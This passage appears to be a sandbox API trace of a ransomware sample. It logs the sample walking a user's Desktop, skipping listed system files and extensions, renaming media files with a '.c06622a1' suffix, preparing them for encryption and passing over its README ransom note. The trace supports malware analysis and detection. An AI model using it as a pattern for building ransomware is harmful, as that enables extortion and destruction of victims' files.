[0148.435] _wcsicmp (_Str1="msp", _Str2="flv") returned 7 [0148.435] wcslen (_String="msp") returned 0x3 [0148.435] _wcsicmp (_Str1="msstyles", _Str2="flv") returned 7 [0148.435] wcslen (_String="msstyles") returned 0x8 [0148.435] _wcsicmp (_Str1="msu", _Str2="flv") returned 7 [0148.435] wcslen (_String="msu") returned 0x3 [0148.435] _wcsicmp (_Str1="nls", _Str2="flv") returned 8 [0148.435] wcslen (_String="nls") returned 0x3 [0148.435] _wcsicmp (_Str1="nomedia", _Str2="flv") returned 8 [0148.435] wcslen (_String="nomedia") returned 0x7 [0148.435] _wcsicmp (_Str1="ocx", _Str2="flv") returned 9 [0148.435] wcslen (_String="ocx") returned 0x3 [0148.435] _wcsicmp (_Str1="prf", _Str2="flv") returned 10 [0148.435] wcslen (_String="prf") returned 0x3 [0148.435] _wcsicmp (_Str1="ps1", _Str2="flv") returned 10 [0148.435] wcslen (_String="ps1") returned 0x3 [0148.435] _wcsicmp (_Str1="rom", _Str2="flv") returned 12 [0148.435] wcslen (_String="rom") returned 0x3 [0148.435] _wcsicmp (_Str1="rtp", _Str2="flv") returned 12 [0148.435] wcslen (_String="rtp") returned 0x3 [0148.435] _wcsicmp (_Str1="scr", _Str2="flv") returned 13 [0148.435] wcslen (_String="scr") returned 0x3 [0148.435] _wcsicmp (_Str1="shs", _Str2="flv") returned 13 [0148.435] wcslen (_String="shs") returned 0x3 [0148.435] _wcsicmp (_Str1="spl", _Str2="flv") returned 13 [0148.435] wcslen (_String="spl") returned 0x3 [0148.435] _wcsicmp (_Str1="sys", _Str2="flv") returned 13 [0148.435] wcslen (_String="sys") returned 0x3 [0148.435] _wcsicmp (_Str1="theme", _Str2="flv") returned 14 [0148.436] wcslen (_String="theme") returned 0x5 [0148.436] _wcsicmp (_Str1="themepack", _Str2="flv") returned 14 [0148.436] wcslen (_String="themepack") returned 0x9 [0148.436] _wcsicmp (_Str1="wpx", _Str2="flv") returned 17 [0148.436] wcslen (_String="wpx") returned 0x3 [0148.436] _wcsicmp (_Str1="lock", _Str2="flv") returned 6 [0148.436] wcslen (_String="lock") returned 0x4 [0148.436] _wcsicmp (_Str1="key", _Str2="flv") returned 5 [0148.436] wcslen (_String="key") returned 0x3 [0148.436] _wcsicmp (_Str1="hta", _Str2="flv") returned 2 [0148.436] wcslen (_String="hta") returned 0x3 [0148.436] _wcsicmp (_Str1="msi", _Str2="flv") returned 7 [0148.436] wcslen (_String="msi") returned 0x3 [0148.436] _wcsicmp (_Str1="pdb", _Str2="flv") returned 10 [0148.436] wcslen (_String="pdb") returned 0x3 [0148.436] _wcsicmp (_Str1="sql", _Str2="flv") returned 13 [0148.436] wcslen (_String="sql") returned 0x3 [0148.436] _wcsicmp (_Str1="sqlite", _Str2="flv") returned 13 [0148.436] wcslen (_String="sqlite") returned 0x6 [0148.436] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0148.436] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0148.436] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0148.436] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0148.436] wcscpy (in: _Dest=0x44d00cc, _Source="qj-mntX.flv" | out: _Dest="qj-mntX.flv") returned="qj-mntX.flv" [0148.436] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qj-mntX.flv", dwFileAttributes=0x80) returned 1 [0148.437] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qj-mntX.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qj-mntx.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0148.437] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.437] ReadFile (in: hFile=0xd8, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0148.438] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x9b1498f4 [0148.438] RtlComputeCrc32 (PartialCrc=0x98f4, Buffer=0x3feb74, Length=0x80) returned 0x81b29376 [0148.438] RtlComputeCrc32 (PartialCrc=0x9376, Buffer=0x3feb74, Length=0x80) returned 0xf7f7ff21 [0148.438] RtlComputeCrc32 (PartialCrc=0xff21, Buffer=0x3feb74, Length=0x80) returned 0x5b30b992 [0148.438] RtlComputeCrc32 (PartialCrc=0xb992, Buffer=0x3feb74, Length=0x80) returned 0x1b6d5b70 [0148.438] CloseHandle (hObject=0xd8) returned 1 [0148.438] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0148.438] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qj-mntX.flv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qj-mntX.flv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qj-mntX.flv" [0148.438] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qj-mntX.flv") returned 0x35 [0148.438] wcscpy (in: _Dest=0x44e00ea, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.438] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qj-mntX.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qj-mntx.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qj-mntX.flv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qj-mntx.flv.c06622a1"), dwFlags=0x8) returned 1 [0148.441] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qj-mntX.flv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qj-mntx.flv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0xd8 [0148.441] CreateIoCompletionPort (FileHandle=0xd8, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0148.441] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4ca0020 [0148.447] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7c2e6378 [0148.447] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4f9c74b6 [0148.447] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x338989ad [0148.447] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x45e896bb [0148.447] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5f21f980 [0148.447] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2e93d513 [0148.447] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xcdf64e0 [0148.447] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x54db757d [0148.450] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4ca0094, Length=0x80) returned 0x499a09c7 [0148.450] RtlComputeCrc32 (PartialCrc=0x9c7, Buffer=0x4ca0094, Length=0x80) returned 0xcd99dde7 [0148.450] RtlComputeCrc32 (PartialCrc=0xdde7, Buffer=0x4ca0094, Length=0x80) returned 0x8c4ced86 [0148.450] RtlComputeCrc32 (PartialCrc=0xed86, Buffer=0x4ca0094, Length=0x80) returned 0x7cb6c410 [0148.450] RtlComputeCrc32 (PartialCrc=0xc410, Buffer=0x4ca0094, Length=0x80) returned 0x77e25384 [0148.450] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4ca0020) returned 1 [0148.450] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0148.450] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0148.450] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd68b50e0, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xd68b50e0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd68db240, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0148.450] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0148.450] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16d04170, ftCreationTime.dwHighDateTime=0x1d5dffb, ftLastAccessTime.dwLowDateTime=0x44862b10, ftLastAccessTime.dwHighDateTime=0x1d5d804, ftLastWriteTime.dwLowDateTime=0x44862b10, ftLastWriteTime.dwHighDateTime=0x1d5d804, nFileSizeHigh=0x0, nFileSizeLow=0x173c9, dwReserved0=0x0, dwReserved1=0x0, cFileName="S k2QDvhJbxo.mp4", cAlternateFileName="SK2QDV~1.MP4")) returned 1 [0148.451] _wcsicmp (_Str1="S k2QDvhJbxo.mp4", _Str2="README.c06622a1.TXT") returned 1 [0148.451] wcsstr (_Str="S k2QDvhJbxo.mp4", _SubStr="README") returned 0x0 [0148.451] _wcsicmp (_Str1="autorun.inf", _Str2="S k2QDvhJbxo.mp4") returned -18 [0148.451] wcslen (_String="autorun.inf") returned 0xb [0148.451] _wcsicmp (_Str1="boot.ini", _Str2="S k2QDvhJbxo.mp4") returned -17 [0148.451] wcslen (_String="boot.ini") returned 0x8 [0148.451] _wcsicmp (_Str1="bootfont.bin", _Str2="S k2QDvhJbxo.mp4") returned -17 [0148.451] wcslen (_String="bootfont.bin") returned 0xc [0148.451] _wcsicmp (_Str1="bootsect.bak", _Str2="S k2QDvhJbxo.mp4") returned -17 [0148.451] wcslen (_String="bootsect.bak") returned 0xc [0148.451] _wcsicmp (_Str1="desktop.ini", _Str2="S k2QDvhJbxo.mp4") returned -15 [0148.451] wcslen (_String="desktop.ini") returned 0xb [0148.451] _wcsicmp (_Str1="iconcache.db", _Str2="S k2QDvhJbxo.mp4") returned -10 [0148.451] wcslen (_String="iconcache.db") returned 0xc [0148.451] _wcsicmp (_Str1="ntldr", _Str2="S k2QDvhJbxo.mp4") returned -5 [0148.451] wcslen (_String="ntldr") returned 0x5 [0148.451] _wcsicmp (_Str1="ntuser.dat", _Str2="S k2QDvhJbxo.mp4") returned -5 [0148.451] wcslen (_String="ntuser.dat") returned 0xa [0148.451] _wcsicmp (_Str1="ntuser.dat.log", _Str2="S k2QDvhJbxo.mp4") returned -5 [0148.451] wcslen (_String="ntuser.dat.log") returned 0xe [0148.451] _wcsicmp (_Str1="ntuser.ini", _Str2="S k2QDvhJbxo.mp4") returned -5 [0148.451] wcslen (_String="ntuser.ini") returned 0xa [0148.451] _wcsicmp (_Str1="thumbs.db", _Str2="S k2QDvhJbxo.mp4") returned 1 [0148.451] wcslen (_String="thumbs.db") returned 0x9 [0148.451] _wcsicmp (_Str1="386", _Str2="mp4") returned -58 [0148.451] wcslen (_String="386") returned 0x3 [0148.451] _wcsicmp (_Str1="adv", _Str2="mp4") returned -12 [0148.451] wcslen (_String="adv") returned 0x3 [0148.451] _wcsicmp (_Str1="ani", _Str2="mp4") returned -12 [0148.452] wcslen (_String="ani") returned 0x3 [0148.452] _wcsicmp (_Str1="bat", _Str2="mp4") returned -11 [0148.452] wcslen (_String="bat") returned 0x3 [0148.452] _wcsicmp (_Str1="bin", _Str2="mp4") returned -11 [0148.452] wcslen (_String="bin") returned 0x3 [0148.452] _wcsicmp (_Str1="cab", _Str2="mp4") returned -10 [0148.452] wcslen (_String="cab") returned 0x3 [0148.452] _wcsicmp (_Str1="cmd", _Str2="mp4") returned -10 [0148.452] wcslen (_String="cmd") returned 0x3 [0148.452] _wcsicmp (_Str1="com", _Str2="mp4") returned -10 [0148.452] wcslen (_String="com") returned 0x3 [0148.452] _wcsicmp (_Str1="cpl", _Str2="mp4") returned -10 [0148.452] wcslen (_String="cpl") returned 0x3 [0148.452] _wcsicmp (_Str1="cur", _Str2="mp4") returned -10 [0148.452] wcslen (_String="cur") returned 0x3 [0148.452] _wcsicmp (_Str1="deskthemepack", _Str2="mp4") returned -9 [0148.452] wcslen (_String="deskthemepack") returned 0xd [0148.452] _wcsicmp (_Str1="diagcab", _Str2="mp4") returned -9 [0148.452] wcslen (_String="diagcab") returned 0x7 [0148.452] _wcsicmp (_Str1="diagcfg", _Str2="mp4") returned -9 [0148.452] wcslen (_String="diagcfg") returned 0x7 [0148.452] _wcsicmp (_Str1="diagpkg", _Str2="mp4") returned -9 [0148.452] wcslen (_String="diagpkg") returned 0x7 [0148.452] _wcsicmp (_Str1="dll", _Str2="mp4") returned -9 [0148.452] wcslen (_String="dll") returned 0x3 [0148.452] _wcsicmp (_Str1="drv", _Str2="mp4") returned -9 [0148.452] wcslen (_String="drv") returned 0x3 [0148.452] _wcsicmp (_Str1="exe", _Str2="mp4") returned -8 [0148.452] wcslen (_String="exe") returned 0x3 [0148.452] _wcsicmp (_Str1="hlp", _Str2="mp4") returned -5 [0148.452] wcslen (_String="hlp") returned 0x3 [0148.453] _wcsicmp (_Str1="icl", _Str2="mp4") returned -4 [0148.453] wcslen (_String="icl") returned 0x3 [0148.453] _wcsicmp (_Str1="icns", _Str2="mp4") returned -4 [0148.453] wcslen (_String="icns") returned 0x4 [0148.453] _wcsicmp (_Str1="ico", _Str2="mp4") returned -4 [0148.453] wcslen (_String="ico") returned 0x3 [0148.453] _wcsicmp (_Str1="ics", _Str2="mp4") returned -4 [0148.453] wcslen (_String="ics") returned 0x3 [0148.453] _wcsicmp (_Str1="idx", _Str2="mp4") returned -4 [0148.453] wcslen (_String="idx") returned 0x3 [0148.453] _wcsicmp (_Str1="ldf", _Str2="mp4") returned -1 [0148.453] wcslen (_String="ldf") returned 0x3 [0148.453] _wcsicmp (_Str1="lnk", _Str2="mp4") returned -1 [0148.453] wcslen (_String="lnk") returned 0x3 [0148.453] _wcsicmp (_Str1="mod", _Str2="mp4") returned -1 [0148.453] wcslen (_String="mod") returned 0x3 [0148.453] _wcsicmp (_Str1="mpa", _Str2="mp4") returned 45 [0148.453] wcslen (_String="mpa") returned 0x3 [0148.453] _wcsicmp (_Str1="msc", _Str2="mp4") returned 3 [0148.453] wcslen (_String="msc") returned 0x3 [0148.453] _wcsicmp (_Str1="msp", _Str2="mp4") returned 3 [0148.453] wcslen (_String="msp") returned 0x3 [0148.453] _wcsicmp (_Str1="msstyles", _Str2="mp4") returned 3 [0148.453] wcslen (_String="msstyles") returned 0x8 [0148.453] _wcsicmp (_Str1="msu", _Str2="mp4") returned 3 [0148.453] wcslen (_String="msu") returned 0x3 [0148.453] _wcsicmp (_Str1="nls", _Str2="mp4") returned 1 [0148.453] wcslen (_String="nls") returned 0x3 [0148.453] _wcsicmp (_Str1="nomedia", _Str2="mp4") returned 1 [0148.453] wcslen (_String="nomedia") returned 0x7 [0148.453] _wcsicmp (_Str1="ocx", _Str2="mp4") returned 2 [0148.454] wcslen (_String="ocx") returned 0x3 [0148.454] _wcsicmp (_Str1="prf", _Str2="mp4") returned 3 [0148.454] wcslen (_String="prf") returned 0x3 [0148.454] _wcsicmp (_Str1="ps1", _Str2="mp4") returned 3 [0148.454] wcslen (_String="ps1") returned 0x3 [0148.454] _wcsicmp (_Str1="rom", _Str2="mp4") returned 5 [0148.454] wcslen (_String="rom") returned 0x3 [0148.454] _wcsicmp (_Str1="rtp", _Str2="mp4") returned 5 [0148.454] wcslen (_String="rtp") returned 0x3 [0148.454] _wcsicmp (_Str1="scr", _Str2="mp4") returned 6 [0148.454] wcslen (_String="scr") returned 0x3 [0148.454] _wcsicmp (_Str1="shs", _Str2="mp4") returned 6 [0148.454] wcslen (_String="shs") returned 0x3 [0148.454] _wcsicmp (_Str1="spl", _Str2="mp4") returned 6 [0148.454] wcslen (_String="spl") returned 0x3 [0148.454] _wcsicmp (_Str1="sys", _Str2="mp4") returned 6 [0148.454] wcslen (_String="sys") returned 0x3 [0148.454] _wcsicmp (_Str1="theme", _Str2="mp4") returned 7 [0148.454] wcslen (_String="theme") returned 0x5 [0148.454] _wcsicmp (_Str1="themepack", _Str2="mp4") returned 7 [0148.454] wcslen (_String="themepack") returned 0x9 [0148.454] _wcsicmp (_Str1="wpx", _Str2="mp4") returned 10 [0148.454] wcslen (_String="wpx") returned 0x3 [0148.454] _wcsicmp (_Str1="lock", _Str2="mp4") returned -1 [0148.454] wcslen (_String="lock") returned 0x4 [0148.454] _wcsicmp (_Str1="key", _Str2="mp4") returned -2 [0148.454] wcslen (_String="key") returned 0x3 [0148.454] _wcsicmp (_Str1="hta", _Str2="mp4") returned -5 [0148.454] wcslen (_String="hta") returned 0x3 [0148.454] _wcsicmp (_Str1="msi", _Str2="mp4") returned 3 [0148.454] wcslen (_String="msi") returned 0x3 [0148.455] _wcsicmp (_Str1="pdb", _Str2="mp4") returned 3 [0148.455] wcslen (_String="pdb") returned 0x3 [0148.455] _wcsicmp (_Str1="sql", _Str2="mp4") returned 6 [0148.455] wcslen (_String="sql") returned 0x3 [0148.455] _wcsicmp (_Str1="sqlite", _Str2="mp4") returned 6 [0148.455] wcslen (_String="sqlite") returned 0x6 [0148.455] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0148.455] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0148.455] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0148.455] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0148.455] wcscpy (in: _Dest=0x44d00cc, _Source="S k2QDvhJbxo.mp4" | out: _Dest="S k2QDvhJbxo.mp4") returned="S k2QDvhJbxo.mp4" [0148.455] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\S k2QDvhJbxo.mp4", dwFileAttributes=0x80) returned 1 [0148.455] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\S k2QDvhJbxo.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\s k2qdvhjbxo.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x638 [0148.455] SetFilePointerEx (in: hFile=0x638, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.455] ReadFile (in: hFile=0x638, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0148.456] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0xa8e3082e [0148.456] RtlComputeCrc32 (PartialCrc=0x82e, Buffer=0x3feb74, Length=0x80) returned 0x8e06eb60 [0148.456] RtlComputeCrc32 (PartialCrc=0xeb60, Buffer=0x3feb74, Length=0x80) returned 0x891b5e94 [0148.456] RtlComputeCrc32 (PartialCrc=0x5e94, Buffer=0x3feb74, Length=0x80) returned 0x22ddf6e1 [0148.456] RtlComputeCrc32 (PartialCrc=0xf6e1, Buffer=0x3feb74, Length=0x80) returned 0x97beb723 [0148.456] CloseHandle (hObject=0x638) returned 1 [0148.456] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0148.456] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\S k2QDvhJbxo.mp4" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\S k2QDvhJbxo.mp4") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\S k2QDvhJbxo.mp4" [0148.456] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\S k2QDvhJbxo.mp4") returned 0x3a [0148.456] wcscpy (in: _Dest=0x44e00f4, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.457] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\S k2QDvhJbxo.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\s k2qdvhjbxo.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\S k2QDvhJbxo.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\s k2qdvhjbxo.mp4.c06622a1"), dwFlags=0x8) returned 1 [0148.459] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\S k2QDvhJbxo.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\s k2qdvhjbxo.mp4.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x638 [0148.459] CreateIoCompletionPort (FileHandle=0x638, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0148.459] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4d30020 [0148.465] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x10042b26 [0148.465] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x668968bf [0148.465] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x612e9415 [0148.465] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x49491df6 [0148.465] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x10ceb067 [0148.465] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x545f5383 [0148.465] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4ad3632d [0148.465] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4abbaf9c [0148.468] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4d30094, Length=0x80) returned 0x7ad3cc6c [0148.468] RtlComputeCrc32 (PartialCrc=0xcc6c, Buffer=0x4d30094, Length=0x80) returned 0x488ed8aa [0148.468] RtlComputeCrc32 (PartialCrc=0xd8aa, Buffer=0x4d30094, Length=0x80) returned 0xb5e536b0 [0148.468] RtlComputeCrc32 (PartialCrc=0x36b0, Buffer=0x4d30094, Length=0x80) returned 0xa8130120 [0148.468] RtlComputeCrc32 (PartialCrc=0x120, Buffer=0x4d30094, Length=0x80) returned 0x360e2ad [0148.468] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4d30020) returned 1 [0148.469] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0148.469] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0148.469] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1475d4a0, ftCreationTime.dwHighDateTime=0x1d5d982, ftLastAccessTime.dwLowDateTime=0x3dfe8150, ftLastAccessTime.dwHighDateTime=0x1d5dbe9, ftLastWriteTime.dwLowDateTime=0x3dfe8150, ftLastWriteTime.dwHighDateTime=0x1d5dbe9, nFileSizeHigh=0x0, nFileSizeLow=0x3714, dwReserved0=0x0, dwReserved1=0x0, cFileName="s9OE-nV-dkAhhF.swf", cAlternateFileName="S9OE-N~1.SWF")) returned 1 [0148.469] _wcsicmp (_Str1="s9OE-nV-dkAhhF.swf", _Str2="README.c06622a1.TXT") returned 1 [0148.469] wcsstr (_Str="s9OE-nV-dkAhhF.swf", _SubStr="README") returned 0x0 [0148.469] _wcsicmp (_Str1="autorun.inf", _Str2="s9OE-nV-dkAhhF.swf") returned -18 [0148.469] wcslen (_String="autorun.inf") returned 0xb [0148.469] _wcsicmp (_Str1="boot.ini", _Str2="s9OE-nV-dkAhhF.swf") returned -17 [0148.469] wcslen (_String="boot.ini") returned 0x8 [0148.469] _wcsicmp (_Str1="bootfont.bin", _Str2="s9OE-nV-dkAhhF.swf") returned -17 [0148.469] wcslen (_String="bootfont.bin") returned 0xc [0148.469] _wcsicmp (_Str1="bootsect.bak", _Str2="s9OE-nV-dkAhhF.swf") returned -17 [0148.469] wcslen (_String="bootsect.bak") returned 0xc [0148.469] _wcsicmp (_Str1="desktop.ini", _Str2="s9OE-nV-dkAhhF.swf") returned -15 [0148.469] wcslen (_String="desktop.ini") returned 0xb [0148.469] _wcsicmp (_Str1="iconcache.db", _Str2="s9OE-nV-dkAhhF.swf") returned -10 [0148.469] wcslen (_String="iconcache.db") returned 0xc [0148.469] _wcsicmp (_Str1="ntldr", _Str2="s9OE-nV-dkAhhF.swf") returned -5 [0148.469] wcslen (_String="ntldr") returned 0x5 [0148.469] _wcsicmp (_Str1="ntuser.dat", _Str2="s9OE-nV-dkAhhF.swf") returned -5 [0148.469] wcslen (_String="ntuser.dat") returned 0xa [0148.469] _wcsicmp (_Str1="ntuser.dat.log", _Str2="s9OE-nV-dkAhhF.swf") returned -5 [0148.469] wcslen (_String="ntuser.dat.log") returned 0xe [0148.469] _wcsicmp (_Str1="ntuser.ini", _Str2="s9OE-nV-dkAhhF.swf") returned -5 [0148.469] wcslen (_String="ntuser.ini") returned 0xa [0148.469] _wcsicmp (_Str1="thumbs.db", _Str2="s9OE-nV-dkAhhF.swf") returned 1 [0148.469] wcslen (_String="thumbs.db") returned 0x9 [0148.470] _wcsicmp (_Str1="386", _Str2="swf") returned -64 [0148.470] wcslen (_String="386") returned 0x3 [0148.470] _wcsicmp (_Str1="adv", _Str2="swf") returned -18 [0148.470] wcslen (_String="adv") returned 0x3 [0148.470] _wcsicmp (_Str1="ani", _Str2="swf") returned -18 [0148.470] wcslen (_String="ani") returned 0x3 [0148.470] _wcsicmp (_Str1="bat", _Str2="swf") returned -17 [0148.470] wcslen (_String="bat") returned 0x3 [0148.470] _wcsicmp (_Str1="bin", _Str2="swf") returned -17 [0148.470] wcslen (_String="bin") returned 0x3 [0148.470] _wcsicmp (_Str1="cab", _Str2="swf") returned -16 [0148.470] wcslen (_String="cab") returned 0x3 [0148.470] _wcsicmp (_Str1="cmd", _Str2="swf") returned -16 [0148.470] wcslen (_String="cmd") returned 0x3 [0148.470] _wcsicmp (_Str1="com", _Str2="swf") returned -16 [0148.470] wcslen (_String="com") returned 0x3 [0148.470] _wcsicmp (_Str1="cpl", _Str2="swf") returned -16 [0148.470] wcslen (_String="cpl") returned 0x3 [0148.470] _wcsicmp (_Str1="cur", _Str2="swf") returned -16 [0148.470] wcslen (_String="cur") returned 0x3 [0148.470] _wcsicmp (_Str1="deskthemepack", _Str2="swf") returned -15 [0148.470] wcslen (_String="deskthemepack") returned 0xd [0148.470] _wcsicmp (_Str1="diagcab", _Str2="swf") returned -15 [0148.470] wcslen (_String="diagcab") returned 0x7 [0148.470] _wcsicmp (_Str1="diagcfg", 